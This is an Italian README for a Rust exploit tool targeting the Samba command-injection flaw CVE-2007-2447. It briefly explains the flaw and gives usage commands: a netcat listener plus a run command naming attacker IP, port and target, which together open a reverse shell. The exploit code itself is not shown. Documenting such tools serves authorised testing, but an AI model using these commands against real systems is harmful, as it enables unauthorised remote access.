
Un'implementazione Rust autonoma dell'exploit CVE-2007-2447 che colpisce Samba smbd 3.0.20-Debian.
Un'implementazione autonoma in Rust dell'exploit CVE-2007-2447 che colpisce Samba smbd 3.0.20-Debian.
CVE-2007-2447 è una vulnerabilità di command injection nelle versioni di Samba dalla 3.0.0 alla 3.0.25rc3. La vulnerabilità risiede nella funzione SamrChangePassword(), che non sanitizza correttamente l'input utente, consentendo a un attaccante di eseguire comandi arbitrari tramite metacaratteri di shell nel campo username durante l'autenticazione SMB.
netcat disponibile (di solito installato di default)cargo run -- --lhost <attacker-ip> --lport <attacker-port> --target <target-ip>
# Configurare un listener netcat
nc -lvnp 4444
# Eseguire l'exploit
cargo run -- --lhost 10.10.14.170 --lport 4444 --target 192.168.1.100
--lhost: Indirizzo IP della tua macchina attaccante--lport: Porta su cui ricevere la connessione della reverse shell--target: Indirizzo IP della macchina targetQuesto strumento è destinato esclusivamente a scopi didattici e a test di penetrazione autorizzati. Usalo con responsabilità e solo su sistemi di tua proprietà o per i quali hai ricevuto esplicita autorizzazione.